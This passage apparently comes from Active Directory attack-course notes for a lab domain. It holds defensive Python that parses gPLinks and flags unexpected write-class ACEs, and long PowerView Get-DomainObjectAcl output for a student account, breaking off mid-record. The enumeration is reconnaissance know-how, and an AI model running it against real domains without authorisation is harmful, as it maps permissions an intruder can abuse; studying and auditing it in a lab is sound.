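GPO_GUID_RE = re.compile(r"^cn=\{([0-9a-f-]{36})\}", re.IGNORECASE)


@dataclass(frozen=True)
class GpoLink:
    guid: str        # GPO cn, upper-cased so it matches the name attribute in any casing
    dn: str          # full DN of the groupPolicyContainer object
    enabled: bool    # options bit 1 clear
    enforced: bool   # options bit 2 set ("Enforced" in GPMC)


def parse_gplink(gplink: str | None) -> list[GpoLink]:
    """Split a gplink attribute into its links, in the order stored in the attribute."""
    links = []
    for dn, options in GPLINK_RE.findall(gplink or ""):
        match = GPO_GUID_RE.search(dn)
        if not match:
            raise ValueError(f"link DN does not start with a GPO GUID: {dn}")
        opts = int(options)
        links.append(GpoLink(match.group(1).upper(), dn, enabled=not opts & 1, enforced=bool(opts & 2)))
    return links


def audit_ou_links(ou_gplinks: dict[str, str], gpo_names: dict[str, str]) -> dict[str, list[tuple[str, str, bool, bool]]]:
    """For each OU, resolve every linked GPO GUID to its displayname.

    A GUID missing from gpo_names is reported as '<dangling link>': the OU still
    points at a groupPolicyContainer that no longer exists (or that the account
    running the enumeration cannot read), which is worth a second look.
    """
    report = {}
    for ou_dn, gplink in ou_gplinks.items():
        report[ou_dn] = [
            (link.guid, gpo_names.get(link.guid, "<dangling link>"), link.enabled, link.enforced)
            for link in parse_gplink(gplink)
        ]
    return report


# name -> displayname, taken from the Get-DomainGPO output above.
GPO_NAMES = {
    "31B2F340-016D-11D2-945F-00C04FB984F9": "Default Domain Policy",
    "6AC1786C-016F-11D2-945F-00C04FB984F9": "Default Domain Controllers Policy",
    "0D1CC23D-1F20-4EEE-AF64-D99597AE2A6E": "Applocker",
    "308279C1-FFB6-4D52-948C-660B07AC77FB": "Servers",
    "7478F170-6A0C-490C-B355-9E4618BC785D": "Students",
}

# gplink values copied from the Get-DomainOU output above, plus one constructed
# OU (OU=Example) with an enforced link and a disabled link to a GPO that does not exist.
OU_GPLINKS = {
    "OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local":
        "[LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local;0]",
    "OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local":
        "[LDAP://cn={308279C1-FFB6-4D52-948C-660B07AC77FB},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]",
    "OU=Example,DC=dollarcorp,DC=moneycorp,DC=local":  # constructed
        "[LDAP://cn={0D1CC23D-1F20-4EEE-AF64-D99597AE2A6E},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;2]"
        "[LDAP://cn={00000000-0000-0000-0000-00000000DEAD},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;1]",
}

if __name__ == "__main__":
    for ou_dn, links in audit_ou_links(OU_GPLINKS, GPO_NAMES).items():
        print(ou_dn)
        for guid, name, enabled, enforced in links:
            state = ("enabled" if enabled else "disabled") + (", enforced" if enforced else "")
            print(f"  {{{guid}}}  {name}  [{state}]")
```

A link whose GUID resolves to nothing is a dangling gPLink: the OU still references a groupPolicyContainer that was deleted, or one the enumerating account cannot read, and either case deserves a check on the domain controller. The option bits (1 = link disabled, 2 = enforced) are the documented gPLink options, which is why the parser needs no directory access.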

ACL Enumeration

Access Control Model
The access control model governs whether a process may access objects and other resources in Active Directory,
based on:
• Access Tokens - the security context of the process: the identity and privileges of the user it runs as
• Security Descriptors - the SID of the owner, the Discretionary ACL (DACL) and the System ACL (SACL)
Access Control List (ACL):
• A list of Access Control Entries (ACEs). Each ACE corresponds to an individual permission or audit setting:
who has the permission and what they can do.
Two types:
• DACL - Defines the permissions a user or a group has on an object
• SACL - Logs success and failure audit messages when an object is accessed
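
The ACE records returned below carry the raw AccessMask next to the decoded ActiveDirectoryRights. The following Python is an added example (not from the course notes and not part of PowerView): it decodes such masks with the ActiveDirectoryRights bit values, names the well-known SIDs and fixed RIDs that appear in that output, and lists the explicit write-class ACEs held by trustees outside an illustrative baseline. SAMPLE_ACES mirrors ACEs from the student163 output; the entries for RIDs 1105 and 1106 are constructed, hypothetical groups.

```python
"""Decode AccessMask values and trustee SIDs from Get-DomainObjectAcl output.

Added example, not part of the course notes or of PowerView. The bit values are
the System.DirectoryServices.ActiveDirectoryRights enum that the
ActiveDirectoryRights column is rendered from; the SID table covers the
well-known SIDs and domain RIDs that appear in the student163 output. The
SAMPLE_ACES entries for RIDs 1105 and 1106 are constructed (hypothetical groups).
"""
from __future__ import annotations

# System.DirectoryServices.ActiveDirectoryRights, single bits.
RIGHTS = {
    "CreateChild": 0x1, "DeleteChild": 0x2, "ListChildren": 0x4, "Self": 0x8,
    "ReadProperty": 0x10, "WriteProperty": 0x20, "DeleteTree": 0x40, "ListObject": 0x80,
    "ExtendedRight": 0x100, "Delete": 0x10000, "ReadControl": 0x20000,
    "WriteDacl": 0x40000, "WriteOwner": 0x80000, "Synchronize": 0x100000,
    "AccessSystemSecurity": 0x1000000,
}
# Composite values from the same enum; matched before the single bits so that
# 983551 decodes as "GenericAll" rather than a list of fifteen flags.
GENERIC = {"GenericAll": 0xF01FF, "GenericRead": 0x20094, "GenericWrite": 0x20028, "GenericExecute": 0x20004}

WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone", "S-1-3-0": "CREATOR OWNER",
    "S-1-5-10": "SELF", "S-1-5-11": "Authenticated Users", "S-1-5-18": "SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators", "S-1-5-32-548": "BUILTIN\\Account Operators",
    "S-1-5-32-554": "BUILTIN\\Pre-Windows 2000 Compatible Access",
    "S-1-5-32-560": "BUILTIN\\Windows Authorization Access Group",
    "S-1-5-32-561": "BUILTIN\\Terminal Server License Servers",
}
# Fixed RIDs that are the same in every domain; the domain part of the SID says which domain.
DOMAIN_RIDS = {512: "Domain Admins", 517: "Cert Publishers", 519: "Enterprise Admins",
               526: "Key Admins", 527: "Enterprise Key Admins", 553: "RAS and IAS Servers"}

# Rights that let a trustee change the object (or who controls it), as opposed to read it.
WRITE_CLASS = (RIGHTS["CreateChild"] | RIGHTS["DeleteChild"] | RIGHTS["Self"] | RIGHTS["WriteProperty"]
               | RIGHTS["DeleteTree"] | RIGHTS["Delete"] | RIGHTS["WriteDacl"] | RIGHTS["WriteOwner"])
# Trustees expected to hold write rights on a user object; anything else holding an explicit
# write-class ACE is worth reviewing. Illustrative baseline, not the full default descriptor.
EXPECTED_WRITER_SIDS = {"S-1-5-10", "S-1-5-18", "S-1-5-32-544", "S-1-5-32-548"}
EXPECTED_WRITER_RIDS = {512, 519}


def decode_rights(mask: int) -> str:
    """Render an AccessMask the way the ActiveDirectoryRights column does."""
    names = []
    remaining = mask
    for name, value in sorted({**RIGHTS, **GENERIC}.items(), key=lambda kv: kv[1], reverse=True):
        if remaining & value == value:
            names.insert(0, name)        # lowest value first, as .NET's [Flags] ToString orders them
            remaining &= ~value
    if remaining:                        # bits outside the enum stay visible as hex
        names.append(f"0x{remaining:X}")
    return ", ".join(names) if names else "None"


def domain_rid(sid: str) -> int | None:
    """Last sub-authority of a domain SID, or None for well-known/non-domain SIDs."""
    return int(sid.rsplit("-", 1)[1]) if sid.startswith("S-1-5-21-") else None


def resolve_sid(sid: str) -> str:
    if sid in WELL_KNOWN_SIDS:
        return WELL_KNOWN_SIDS[sid]
    rid = domain_rid(sid)
    if rid in DOMAIN_RIDS:
        return f"{DOMAIN_RIDS[rid]} (RID {rid})"
    if rid is not None:
        return f"domain principal RID {rid} (resolve via LDAP)"
    return f"unresolved {sid}"


def find_unexpected_write_grants(aces: list[dict]) -> list[tuple[str, str, str | None]]:
    """Explicit (non-inherited) write-class ACEs held by trustees outside the baseline.

    Inherited ACEs come from the parent container's descriptor and are reviewed there;
    extended rights are left out because each one (e.g. User-Change-Password, the
    self-service password change) needs its own judgement.
    """
    findings = []
    for ace in aces:
        if ace["inherited"] or not ace["mask"] & WRITE_CLASS:
            continue
        if ace["sid"] in EXPECTED_WRITER_SIDS or domain_rid(ace["sid"]) in EXPECTED_WRITER_RIDS:
            continue
        findings.append((resolve_sid(ace["sid"]), decode_rights(ace["mask"]), ace["object_type"]))
    return findings


D = "S-1-5-21-719815819-3726368948-3917688648"   # dollarcorp domain SID from the output
SAMPLE_ACES = [
    {"sid": f"{D}-512", "mask": 983551, "inherited": False, "object_type": None},
    {"sid": "S-1-5-32-548", "mask": 983551, "inherited": False, "object_type": None},
    {"sid": "S-1-5-10", "mask": 48, "inherited": False, "object_type": "Personal-Information"},
    {"sid": "S-1-1-0", "mask": 256, "inherited": False, "object_type": "User-Change-Password"},
    {"sid": "S-1-5-11", "mask": 131072, "inherited": False, "object_type": None},
    {"sid": f"{D}-526", "mask": 48, "inherited": True, "object_type": "ms-DS-Key-Credential-Link"},
    {"sid": "S-1-5-32-554", "mask": 16, "inherited": True, "object_type": "User-Account-Restrictions"},
    {"sid": f"{D}-1105", "mask": 262144, "inherited": False, "object_type": None},   # constructed
    {"sid": f"{D}-1106", "mask": 16, "inherited": False, "object_type": None},       # constructed
]

if __name__ == "__main__":
    for ace in SAMPLE_ACES:
        print(f"{resolve_sid(ace['sid']):45} {decode_rights(ace['mask'])}")
    print("review:", find_unexpected_write_grants(SAMPLE_ACES))
```

Running it prints each trustee with its decoded rights and then the review list, which for the sample contains only the constructed RID 1105 WriteDacl grant: an explicit ACE that lets a non-administrative principal rewrite the DACL of another user is exactly the kind of entry to compare against the intended delegation model and to remove if nobody can account for it.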

Using PowerView
Getting the ACLs associated with a specified object
PS C:\Users\student163> Get-DomainObjectAcl -SamAccountName student163 -ResolveGUIDs

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-1-0
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : X509-Cert
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-517
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups-Global-And-Universal
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-560
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server-License-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : Send-As
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : Receive-As
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Public-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Personal-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Web-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Personal-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Email-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Web-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-512
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-548
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadControl
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 131072
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 131220
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Key-Credential-Link
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-527
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Key-Credential-Link
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
